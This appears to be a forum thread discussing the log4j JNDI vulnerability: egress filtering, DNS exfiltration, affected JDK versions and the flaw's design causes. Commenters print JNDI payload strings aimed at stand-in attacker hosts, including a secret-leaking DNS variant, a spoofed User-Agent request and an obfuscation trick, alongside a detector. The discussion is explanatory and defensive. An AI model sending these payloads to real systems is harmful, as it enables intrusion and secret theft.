We just spent the better part of the day going through applications and figuring out whether they use log4j and, if so, which version, then fixing code and notifying customers. Then we remembered that the majority of our servers can't actually reach the internet. They only accept requests; they cannot make outbound requests to the internet.
I know it's a little old fashioned, as explained to me by a customer earlier this year. In the age of cloud, people expect their servers to have a direct internet connection.
It's annoying to work with, but ideally your devices should only be able to reach the internet via a proxy and/or only to whitelisted hosts. Understandably there are cases where this just isn't an option, but do consider whether your server truly needs to communicate with the internet at large. Can you use an HTTPS proxy and just whitelist the required domains? The answer is most often "yes"; it's just a little more work.
Is there any chance that when asked to contact a service, your locked down machines first issue a DNS lookup to determine where to try to connect to, before the connection attempt gets blocked by your aggressive whitelisting?
If so, there might still be a DNS exfiltration vulnerability even on your tightly controlled setup.
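To make that risk concrete, here is a small Python sketch (hostnames and the secret are made up) of how a lookup payload smuggles data into the hostname of a DNS query, so the resolver carries it out for the attacker even when outbound TCP is blocked:

```python
# Sketch of why DNS alone can exfiltrate data even when outbound TCP is
# blocked: a vulnerable log4j expands the inner lookup first, so the secret
# becomes a DNS label, and the recursive resolver delivers it to the
# attacker's authoritative nameserver. Hostname and secret are hypothetical.
secret = "hunter2"  # stands in for the result of something like ${env:API_KEY}
payload = "${jndi:ldap://" + secret + ".dns-log.attacker.example/a}"

# The hostname the JNDI lookup would try to resolve:
queried_name = payload.split("//")[1].split("/")[0]
print(queried_name)  # hunter2.dns-log.attacker.example
```

The DNS query itself never has to reach the attacker's server directly; it only has to reach your resolver, which forwards it up the DNS hierarchy.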
I would love it if PaaS providers such as Heroku and Fly.io had configurable outbound firewalls. Especially when building with un-curated package managers such as NPM and PyPI, it’s virtually impossible to audit all dependencies.
Exploits like this, and the now-regular news of packages being replaced with backdoored versions, make me very nervous. Being able to whitelist outbound connections would help enormously, even though it would not solve all potential exploits.
Is there a recommended way to do this with a Docker app?
Edit: I should note we already use an inbound WAF (Cloudflare). What I want is something like Little Snitch, but for a PaaS-deployed app.
For PaaS this won’t work, but for on-prem stuff you can just log firewall denies on outbound traffic; that will quickly let you know if something's wrong.
You could have a test environment where your container runs for a few days before pushing to production on a PaaS. Just run the container on a VM with iptables and logging. It won’t find everything (some calls might only happen under very specific circumstances), but it could find the low-hanging fruit.
Preach it. I have been the bane of third-party software vendors for years because I require a default-deny outbound policy for servers (and erring on the side of default-deny between subnets, generally).
This log4j vulnerability will serve, for me, as yet one more example as to why that's a good idea.
I think the bane is when you make it hard to get exceptions. If a developer can add a specific IP, or ideally a domain, to the "allow" group, automatically, that's far less impact than if you have to fill in pages of paper explaining why you need outbound access. In the latter case, developers will work around your restrictions, and you're simply left with a false sense of security.
Arguably you shouldn't make it too hard to get exceptions, but what we frequently see is that developers don't appear to know that their code makes outbound connections, and they certainly don't mention it as part of the requirements.
We've frequently built setups where machines are completely isolated, because the requirements did not mention that the software would connect to servers on the internet. When we install the software it then fails to work, because it was never tested in a closed environment. I've seen Java applications fail to boot because they can't pull an XSD from the internet... Why isn't that just bundled? Why do you need to fetch it at boot time? What if that other server is down?
But you're right, valid firewall openings should not be hard to get.
So many vendors (I work with a lot of COTS software-- not in-house-developed) have absolutely no idea what their communication dependencies are (client-to-server, server-to-server, etc). I've ended up being the first sysadmin to ask more times than I'd like to count.
I, like the grandparent poster suggested, prefer to put applications where the developer demands carte blanche access to the Internet via TCP port 443 behind a MiTM proxy and whitelist domains. (I don't do as much to stop DNS-based exfiltration as I should be doing, though. It's probably a good time to revisit that using this vulnerability as a practical justification.)
> I know it's a little old fashioned, as explained to me by a customer earlier this year.
It is only considered outdated by proponents of cloud services, since IP-based filters are difficult to implement and/or require high maintenance.
Otherwise sensible network segmentation and access rules are pretty much one of the best security mechanisms you can implement, far beyond the usual theatre some security products want to sell.
> proof-of-concept (PoC) code has evidently been available since March of 2021
This GitHub repo was for an older vulnerability[1] (CVE-2019-17571).
> monitor web application logs for evidence of attempts to execute methods from remote codebases (i.e. looking for jndi:ldap strings)
As the templates are interpreted recursively, the payload can easily be obfuscated, e.g. using "${${lower:j}${lower:n}..."[2]. I saw BinaryEdge's scanner already using that trick, for example.
I've seen a couple dozen attempts with "jndi", but nothing matching "j.n.d.*i". Very few attacks though - I remember the height of the Code Red days, I was seeing orders of magnitude more attempts.
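The obfuscation trick above is exactly why a bare "jndi" substring match is too naive. A small Python sketch (illustrative only, nowhere near a production detector; real payloads use many more encoding tricks) that strips the ${lower:x}/${upper:x} wrappers before searching:

```python
import re

# Illustrative detector: unwrap single-character ${lower:x}/${upper:x}
# lookups, then search for the jndi prefix case-insensitively.
WRAPPER = re.compile(r"\$\{(?:lower|upper):(.)\}", re.IGNORECASE)

def looks_like_jndi(log_line: str) -> bool:
    unwrapped = WRAPPER.sub(lambda m: m.group(1), log_line)
    return "${jndi:" in unwrapped.lower()

print(looks_like_jndi("${jndi:ldap://evil.example/a}"))  # True
print(looks_like_jndi(
    "${${lower:j}${lower:n}${lower:d}${lower:i}:ldap://evil.example/a}"))  # True
print(looks_like_jndi("GET / HTTP/1.1"))  # False
```

Even this misses variants such as `${::-j}` default-value tricks, which is why log scanning alone is not a reliable mitigation.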
I've not seen much speculation on how this bug was created in the first place, so I'll take a guess here:
On https://logging.apache.org/log4j/2.x/manual/lookups.html it says: "Lookups provide a way to add values to the Log4j configuration at arbitrary places." I think the person/team that implemented the Lookup feature never intended it to be used outside of the configuration files, which are clearly part of the codebase and therefore trusted. I can fully understand why this is seen as a useful feature.
Then someone else came along, saw that there was a useful feature that could automatically expand stuff like the request URL in a log message, and embedded it in the log message parser. I don't think this should ever have been implemented, and certainly not enabled by default. Even if there were no LDAP remote code execution (OK, we can blame Java for this) or JNDI lookups (which can leak data to the outside), this lets user-provided input be used as a query against all the stuff that can be inserted by Lookups (environment variables, request headers, JVM arguments, ...). For example, someone who just has access to the logs can use this to query secrets stored in the environment of the app.
> According to a translated technical blog post, JDK versions greater than 6u211, 7u201, 8u191, and 11.0.1 are not affected by the LDAP attack vector. com.sun.jndi.ldap.object.trustURLCodebase is set to false, meaning JNDI cannot load a remote codebase using LDAP.
As for JDK 8, numerous outlets are reporting that it is actually Java 8u121 that protects against JNDI remote class loading by default (see release notes https://www.oracle.com/java/technologies/javase/8u121-relnot...). That was released in 2017-01, just about five years ago. I think that should save a lot of people's bacon, should it not?
This post claims the history of which releases closed which holes is a bit more complicated and that 8u191 really is the first release to prevent this particular exploit. However it also points out that it’s still possible to achieve RCE via log4j template expansion in certain Tomcat and Websphere configurations:
The remote class loading is the most severe part of this, but even without it, this vulnerability still does things like leak environment variables to arbitrary remote endpoints.
Not really? Your link shows that log4j is not used in Jenkins core.
Moreover, they provided a nice test to see, on a particular installation, if any plugins are affected. Judging by the provided link to their issue tracker (https://issues.jenkins.io/browse/JENKINS-67361?jql=labels%20...), there only seem to be a handful of plugins affected, and none appear to be super widely used.
They are responding really well to this, by the way. That blog post is clear and useful information is being added. Kudos to the Jenkins team!
I agree with this; I think the risk of Jenkins as an attack vector is low. It's very possible, for example, to pull in a malicious dependency that then outputs a message that gets logged and takes advantage of this vulnerability.
But, at that point, if you've already pulled in a malicious dependency you're probably already screwed by an easier method than this log4j issue.
This also affects Minecraft servers afaik. There is probably a huge amount of internet exposed resources running vulnerable versions that are unlikely to be patched.
Minecraft is specifically one of the most vulnerable because the chat is written to the server log. So, all it takes is a chat message to run the exploit.
A specially formatted log entry can cause the logging library to fetch and run remote code. So if you're printing something a user provides into your logs, you're decently likely to be screwed.
More amazingly, this is intentional. If you didn't want log4j to trivially exec remote code, you were expected to add a properties file telling it not to.
This part is really beyond baffling to me. I could understand pre-configured format strings being allowed to do some crazy shit, but I can't for the life of me understand why log4j would opt to allow any logged string to be given access to a powerful lookup/configuration language, even beyond the specific JNDI issue at hand.
Enterprise software needs infinite features. There is no saying "no" to a feature request on enterprise software. It's OK, most of those servers are inside the enterprise only and are extensively firewalled anyway, and nobody would do "debugging" logging on a "production" server anyway, that's not very enterprise-y, and professional sysadmins know what they're doing.
Somehow ends up installed on ten million completely unmaintained minecraft servers directly connected to the raw internet with no firewalling and not really any sysadmin skills, then chaos ensues.
I would suggest at least two important mechanisms at work.
First, template libraries have a fundamental drive towards power. A lot of people will talk big about separating the data from the template, but my gosh it's convenient to put for loops in your template, and be able to resolve properties, and before you know it, one feature at a time, your template code is basically as powerful as your local reflection capabilities. Sometimes, as may have happened here, even the people implementing these powerful features do not know how powerful they are. So there's this powerful pull on template libraries to become more and more powerful.
But they're usually written from an assumption of the user of the template having full control over the contents and that nobody is maliciously feeding content to it. It's an assumption that template libraries often start with, as an unspoken and unexamined assumption. Unbeknownst to the template library author, someone out in the world turns out to want templates, because they're so useful and convenient, and the person picking the template library may never consider whether or not the template library they are using matches the security profile they need, because quite often literally nobody at any point of this process is really thinking about that. So it's really easy for someone to grab a templating library that is way too powerful. They're likely to even consider "way too powerful" as a feature.
Second, there is a common mistake made in reflection-type APIs shared by many dynamic languages (dynamic languages have their "reflection-type APIs" simply built in, static languages usually have a library/module/package), and also in this case, Java, whereby there is some API to take some sort of string that identifies a class, and get an instance of it, or whatever the local equivalent is. Unfortunately, this turns anything that can invoke this functionality into arbitrary function execution, and "arbitrary function execution" is often leveragable into "arbitrary code execution" with only a bit more work. Again, this is done because it's really convenient and powerful, but it also means there's this Magic Portal in your language where if something can reach out to that functionality, then it can reach anything in the runtime, or possibly beyond if code can be loaded (which it usually can).
These two things, when combined, create devastating security bugs. Relatedly, overaggressive deserializers can also serve as your gateway into reflection ("my gosh it's convenient to be able to name arbitrary classes and deserialize into instance of them"), which is what Ruby had with its YAML arbitrary code execution a few years back. The combination of "some way into the reflection system" and "a reflection system that allows access to all classes in the system" is deadly.
Taking it one "why" further down, I think developers do not in general understand the interplay between "power" and "restrictions". There's a lot of developers who, given the choice, will always choose power, but in a multi-user world, that means you lose out on some very useful restrictions. A "power programmer" may chafe if they have to work in Go or C or C++ or some other language that doesn't have the built-in "name a class with a string, get an instance" functionality, but having that restriction around turns out to be very useful.
When you add more "power" to anything, you should always flip the question around and consider it from the dual perspective of "what restrictions am I losing in order to obtain this power?" Sometimes it will be nothing you care about, and in that case, go for the power by all means. But sometimes, deliberately putting down the "power" to simply name a class and get an instance means you're putting in a very, very useful guard rail.
(If you think about it, there's almost never a situation where you need to name an arbitrary class. You can almost always instead force some sort of manual registry of such things. Even cases you might think otherwise like "interpreters" you could probably still force manual registration of allowed classes. Only a very privileged interpreter that is very trusted could be allowed to have that power and lose that restriction.)
It is really easy to lose track, in all these moving pieces, of the fact that you've given away too much power.
Is there a more generous perspective than this? I've been reading but from what I can tell this was just a terrible idea. Hindsight is 20/20 and all - but really?
I think the "generous" perspective is that there was a JRE update once which disabled the remote code execution feature by default. Note, this was a JRE update, not a log4j update.
Note, as others have commented, the JRE change prevented the fully open-ended RCE where you could download classfiles from an external server and run them. However, the log4j bug does still allow posting of environment variables to external servers, even with the JRE changes, which could be just as catastrophic.
That was my understanding anyway, someone correct me if I'm wrong.
No, the log4j devs really seem to have thought it was a good idea to have this (1) built, and (2) enabled by default. One of them was on twitter whinging that they needed it for backcompat. I just can't.
I'm no expert but shouldn't servers be behind some sort of firewall so they won't download code (or anything else) from random remote machines? Why would a server need unfettered access to the outside internet during standard operations?
They should, but they often aren't. Also, even if they are, this can be exploited with a port number the attacker picks. So unless you specifically whitelisted what outbound hosts your machine can reach and only those (which is rarely done and not always possible), it isn't likely to help.
Shortest version: log4j has a helpful "feature" where if you log a specifically formatted string as a value, it can trigger things like DNS lookup or remote code execution.
If you use a vulnerable log4j version to log any user-controlled value (such as a User-Agent header), it's a bad time.
Evidently Minecraft used log4j to log user chat messages, allowing a player on a server to leak other players' IP addresses.
So far people have been showing off RCE "hello world" for both minecraft clients and servers on twitter.
In terms of actual threat, this exploit could very easily be abused to rapidly spread ransomware, cryptominer malware, botnet slave code, and other nasties.
You could (devs on Twitter have been playing with this) build a script that connects to random servers listed on Shodan and sends a message with a payload in it. This payload then executes on both the clients and the server, infecting them. Then those clients can have their credentials and server lists used to infect other servers and clients. Considering how many Minecraft servers are just thrown up on old Windows machines by people with little to no IT knowledge, I can see this getting out of hand very quickly.
How does the downloaded java class get executed though? I get that you can get the logger to download from a server but what needs to be on the server? e.g. how does it trigger the malicious java class? Does it need to contain certain methods/interface?
A serialized instance of the class is downloaded and deserialized; that the class itself is also downloaded (based on server-provided auxiliary download locations) is a secondary feature. Deserializing the instance may run a custom deserialization method of the class, which in turn would contain the malicious code.
The serialized object doesn’t contain any code. But the client needs the code of object’s class to deserialize it.
Instead of providing the object directly, the server can provide a JNDI object reference, which (among other things) contains a `classFactoryLocation` attribute specifying a URL where the bytecode of the class of the serialized object can be downloaded. If the class isn’t already present in the client’s codebase, the client proceeds to download it, in order to then be able to deserialize the actual object of interest.
This only works over LDAP, with the intended use-case that enterprises store and organize their code repository as part of their LDAP directory.
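Schematically, the client-side flow described above looks something like this Python sketch. This is not real JNDI internals; the entry field names and helper functions are illustrative stand-ins:

```python
# Schematic sketch of a client handling an LDAP result that carries a JNDI
# object reference. All names here are hypothetical, not the real JNDI API.
def download(url: str) -> str:
    # stands in for fetching class bytecode from a server-controlled URL
    return f"<bytecode from {url}>"

def deserialize(blob: str, bytecode: str) -> str:
    # in the real attack, deserializing runs code from the fetched class
    return f"instance({blob}, {bytecode})"

def handle_ldap_result(entry: dict, local_classes: dict) -> str:
    cls = entry["class_name"]
    if cls not in local_classes:  # class not on the client's classpath?
        local_classes[cls] = download(entry["class_factory_location"])
    return deserialize(entry["serialized_object"], local_classes[cls])

result = handle_ldap_result(
    {"class_name": "Evil",
     "class_factory_location": "http://attacker.example/Evil.class",
     "serialized_object": "<blob>"},
    {},
)
print(result)
```

The dangerous step is that the *server being queried* supplies both the data and the location of the code used to interpret it; the JRE hardening discussed elsewhere in the thread disables exactly that download step by default.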
The library parses logged messages for commands, which include one that amounts to "connect to this server, download code from there, run it". To exploit it, put such a command into any place the app will write to the log.
Actually, the command is "download this serialized Java object", and the server serving the object can add "by the way, you will need these classes for deserializing the object", and the client "ok, I’ll download those as well then", and upon deserializing the object, code from the downloaded classes is run (the actual RCE) in order to initialize the class and deserialize the instance.
Can someone clarify whether this template expansion happens only in the format string, or in the substituted string as well?
I.e. is it affecting just code like this:
It's been widely reported that iCloud is exploitable (by setting your phone's name to something that includes the "${jndi:ldap://...}" incantation), so if you're using an iPhone, cloud services you use may have been compromised. Haven't seen an assessment yet of exactly what's at risk from that. Also haven't seen much about Android apps using log4j -- depending on how (and whether) Android's nonstandard library handles JNDI, this may be mitigated, but stay tuned.
As to home PCs -- if you're running anything written in Java which logs strings under somebody else's control (email subject lines, to cite one potentially plausible example), well... they might be able to run code on your box.
It's not clear if iCloud is exploitable. Just the DNS lookups do not prove that remote code execution via ldap is active. In fact, if they are using an up to date JRE, it's not.
I tried to exploit my own apps and could only get it to work when setting com.sun.jndi.ldap.object.trustURLCodebase to true
I'm not a security expert. I spent a good chunk of time yesterday mitigating this with our security people so I have a decent overview of the bug and how it's exploited. If you aren't running an application on your home server or phone that others can connect to from outside your network then this isn't likely an issue for you. Take this as inexpert guidance until someone more authoritative chimes in. The vector of vulnerability here is user content getting into log messages, as can happen if you log headers from user connections for example.
Actually, the attack surface is larger. It is: the machine receives strings from a service that's been connected to the internet somehow, and the machine itself can connect to the internet. A non-obvious example would be logs/data that will be processed by Solr.
> If you aren't running an application on your home server or phone that others can connect to from outside your network then this isn't likely an issue for you.
The direction of the connection isn't relevant. For instance, when you are playing Minecraft and connect to a server, the connection starts from inside your network, but could be used to attack your Minecraft client.
Big picture being missed: there has been a societal argument for decades over the fact that once you log something you're responsible for it, over who owns the logs of what you do, the profit generated by Big Brother, etc.
So we have the right to be forgotten, all kinds of tracking laws depending on a mix of who owns the device versus where it's geographically located today, and now, if you log stuff like user-agent strings, someone can send you a very toxic string that causes enormous problems.
The very short term solution is to fix big brother so he can go back to safely watching our every move, the longer term question is how many security problems are you willing to have in order to extensively and permanently track and log people?
There is also an interesting "tree falls in the forest" effect: if you know there will be no professional sysadmin support to debug or fix or work on your Minecraft server, why are you making logs at all, given that logging can be exploited just like anything else? I worked with a guy in the early internet days who wanted an old-fashioned page every time an exploit came in from China; I asked what was actionable about that, other than that they could DDoS his pager and he couldn't call in an airstrike on them. He disabled his pager notifications; they were of negative net value. We are nearing that point for extensive logging.
It's very hard to use a log exploit on software that doesn't log. So why are so many things logged that shouldn't be logged, either because it's inconceivable that a pro would ever access the logs, or because it's inherently bad to log that kind of PII for ethical reasons?
User data is historically seen as always the purest of gold nuggets to be hoarded and traded for valuables; reality is sometimes user data is plague blankets and you don't want them. May be nearing a point where "log everything" has a negative value.
Software only increases in complexity over time; complexity means more security problems; at some point "log everything" has too many downsides and not enough upsides. The world's only going to have more "little bobby tables", not fewer.
Certainly the long term solution to millions of minecraft servers logging dangerous packets is to not log at all. There's not a downside.
However, as I don't have log4j exposed on the outside, it's fine (the request gets redirected to HTTPS and is then asked for an X.509 certificate, which it doesn't provide, so it gets dropped).
Minecraft logs every message from other players it receives, so all you have to do is type a message and everyone on the server is exploited.
Yes, this is still possible if you log any user-modifiable value. One example would be logging a user-agent header: if an attacker spoofs this to include a JNDI URI, then the vulnerability can be exploited.
This is why this CVE is so scary - I would imagine the majority of applications using log4j will log out a user-supplied value at some point.
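For illustration, this Python snippet builds (but never sends) a request carrying the payload in a spoofed User-Agent header; both URLs are hypothetical:

```python
from urllib.request import Request

# Builds, but does not send, a request with a malicious User-Agent value.
# Any middlebox or app that logs this header with a vulnerable log4j is hit.
payload = "${jndi:ldap://attacker.example/a}"
req = Request("https://victim.example/", headers={"User-Agent": payload})

# note: urllib normalizes header-name capitalization to "User-agent"
print(req.get_header("User-agent"))  # ${jndi:ldap://attacker.example/a}
```

The point is how ordinary the request looks: nothing about it is malformed, so it sails through load balancers and into every log pipeline along the way.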
How about feeding the magic string via Host header in your requests and then cutting off? You wouldn't even need to establish the full TLS handshake, SNI is sent in the clear, and you would get to hit every single load-balancer and middle box - and everything they send their logs to.
Are you ever logging strings that come from outside your software, be it things users type in, HTTP headers, ...? Then you don't control whether you are "using any of the JNDI special URIs".
This vulnerability is equivalent to using printf(userData) when you should have done printf("%s", userData). From the perspective of the library developer, the feature is only available in the format string.
The log4j maintainers seem to have realized that this (the "%m" in a PatternLayout doing lookups) is a bad idea around version 2.10 (released in 2017) or even version 2.7[2] (released in 2016). These versions both included changes that allowed you to disable this behavior. Unfortunately, the Java compatibility mindset meant that they didn't take the further logical step of making the behavior that disables lookups the default.
I think this vulnerability should be used as a lesson against the vagaries of the classic Java API design issues that we're now finally starting to turn away from. Having an extensible formatting mechanism is not necessarily a bad idea, but the problem with this and so many other "magic" features provided by Java libraries is that they are:
* Opt out, instead of opt-in
* Hard to discover - if you don't read the ENTIRE log4j documentation (which is pretty large!), it's hard to know that this stuff is happening.
* Too inclusive - adding JNDI was a bad idea, but even allowing things like environment variables or JMX Beans to be looked-up wholesale from a non-sanitized message is a bad idea.
The problem is much deeper than log4j really. In hindsight, features like JNDI, RMI, and most of all Java Serialization should have never been part of Java in the first place.
If you log any sort of input from outside, then attackers get to supply their own URLs.
This will trigger even if you're doing it yourself because log4j also keeps recursively expanding macros in the log string until no more are found. So parameterizing your log statements isn't a defense against this the way parameterizing your SQL statements would be for SQL injection.
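A toy Python model (again, not log4j itself, and modeling only a `${lower:x}` lookup for brevity) of why parameterization doesn't help: the placeholder is filled in first, and lookup expansion then runs over the assembled message:

```python
import re

# Toy model of parameterized logging followed by recursive lookup expansion.
# Because expansion happens AFTER the {} placeholder is filled in, a payload
# in the parameter value still gets expanded, unlike parameterized SQL.
LOOKUP = re.compile(r"\$\{lower:(.)\}")

def format_message(pattern: str, arg: str) -> str:
    assembled = pattern.replace("{}", arg)   # parameter substitution first
    while LOOKUP.search(assembled):          # then expansion to a fixed point
        assembled = LOOKUP.sub(lambda m: m.group(1).lower(), assembled)
    return assembled

user_input = "${${lower:J}${lower:N}${lower:D}${lower:I}:ldap://evil.example/a}"
print(format_message("UA: {}", user_input))  # UA: ${jndi:ldap://evil.example/a}
```

In real log4j the resulting `${jndi:...}` string would then itself be resolved, which is the step this sketch deliberately stops short of.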
Meta: This website has one of the worst and most ridiculous cookie opt-out mechanisms. You are expected to read through a wall of text and follow complex instructions to manually opt-out of each vendor.
The fact that Java can download, parse, and load code is the original sin of the runtime. It never made sense and the classloader has been exploitable from Day 1. They need to rip out the whole concept, and RMI needs to be eradicated as well.